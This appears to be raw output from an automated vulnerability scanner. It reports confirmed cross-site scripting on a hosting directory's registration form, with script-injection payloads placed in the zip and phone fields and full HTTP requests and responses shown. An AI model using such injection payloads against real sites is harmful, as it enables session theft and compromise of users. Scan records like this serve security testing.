<p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p>
<p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p>
<p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p>
</div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span>&nbsp;<strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body">&nbsp;<B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
- /register.php

/register.php CONFIRMED

https://www.hostingcatalog.com/register.php

Parameters

Parameter Type Value
company_name POST Smith
first_name POST Smith
last_name POST Smith
address POST 3
address2 POST 3
city POST 3
state POST 3
province POST 3
zip POST '"--></style></script><script>alert(0x001D9A)</script>
country POST 225
phone POST 3
e_mail POST netsparker@example.com
retype_e_mail POST netsparker@example.com
password POST 3
retype_password POST 3
account_type POST 1
deposit POST 3
promo_code POST 3
card_type POST 1
card_number POST 3
expire_date POST 3
owner_first_name POST Smith
owner_last_name POST Smith
bill_address POST 3
bill_address2 POST 3
bill_city POST 3
bill_state POST 3
bill_province POST 3
bill_zip POST 3
bill_country POST 225
bill_phone POST 3

Request

POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 544
Accept-Encoding: gzip, deflate

company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D9A)%3c%2fscript%3e&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:17:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0">
<form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr>
<td valign="top"><img src="images/header/mostpopular.gif"></td>
<td> <select name="select" onChange="goBannerLink(this);" class="dropdown">
<option value="0">Unix/Linux</option>
<option value='76E0188F5F077DBDA971334CDE9E3F2CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBD64DFABC32DE5FA9A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBDB9A639E753F1C6D4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD76160ADDCBFD024CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBDA040BB48F2BA4B706F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select>
&nbsp; </td>
<td> <select name="select" onChange="goBannerLink(this);" class="dropdown">
<option value="0">Dedicated Servers</option>
<option value='76E0188F5F077DBDE9C44FBF5A3783C7C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBDA28BA7236305A230C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBDA1C304AB22C5F7CF6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBDAA54B2A79DFC3F83C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBDFE07177A8248E07A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option>
</select>
&nbsp; </td>
<td> <select name="select" onChange="goBannerLink(this);" class="dropdown">
<option value="0">Budget and Free</option>
<option value='76E0188F5F077DBD12A7E2E6BD950AE0C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBDD25B27FEA0A3E7A6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBD5A62BD5735D1740FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBDE1F8C1FA57583949C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBD504D178C2727600AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option>
</select>
&nbsp; </td>
<td> <select name="select" onChange="goBannerLink(this);" class="dropdown">
<option value="0">Wholesale/Reseller</option>
<option value='76E0188F5F077DBD2D79E432F23AA6D9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBDD31290EA3E1B3AF06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBDA3CEEA8CBEAD111B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBDE436BD464E90E73E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option>
</select>
&nbsp;&nbsp;
<input type="hidden" name="param" value=""> </td>
</tr>
</form>
</table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="headerlink"><a href="index.php">Home</a></td>
<td><img src="images/header/nav_divider.gif"></td>
<td class="headerlink">List Your Company</td>
<td><img src="images/header/nav_divider.gif"></td>
<td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td>
<td><img src="images/header/nav_divider.gif"></td>
<td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td>
<td><img src="images/header/nav_divider.gif"></td>
<td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td>
<td><img src="images/header/nav_divider.gif"></td>
<td class="headerlink"><a href="partner">Partner Login</a></td>
<td>&nbsp;&nbsp;</td>
</tr>
</table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css">

p {
font-size: 14px;
font-family: arial, verdanna, sans-serif;
}

h2 {
font-size: 16px;
font-family: arial, verdanna, sans-serif;
font-style: bold;
}

td.body {
color : #000000;
font-family : Arial, Tahoma, sans-serif;
font-size : 14px;
}

</style>
<h2>Create A Hosting Catalog Account</h2>
<p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p>
<p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p>
<p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p>
<p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p>
<p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p>
<p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p>
</div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span>&nbsp;<strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body">&nbsp;<B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
- /register.php

/register.php CONFIRMED

https://www.hostingcatalog.com/register.php

Parameters

Parameter Type Value
company_name POST Smith
first_name POST Smith
last_name POST Smith
address POST 3
address2 POST 3
city POST 3
state POST 3
province POST 3
zip POST 3
country POST 225
phone POST '"--></style></script><script>alert(0x001DAA)</script>
e_mail POST netsparker@example.com
retype_e_mail POST netsparker@example.com
password POST 3
retype_password POST 3
account_type POST 1
deposit POST 3
promo_code POST 3
card_type POST 1
card_number POST 3
expire_date POST 3
owner_first_name POST Smith
owner_last_name POST Smith
bill_address POST 3
bill_address2 POST 3
bill_city POST 3
bill_state POST 3
bill_province POST 3
bill_zip POST 3
bill_country POST 225
bill_phone POST 3

Request

POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 544
Accept-Encoding: gzip, deflate

company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001DAA)%3c%2fscript%3e&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:17:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Trans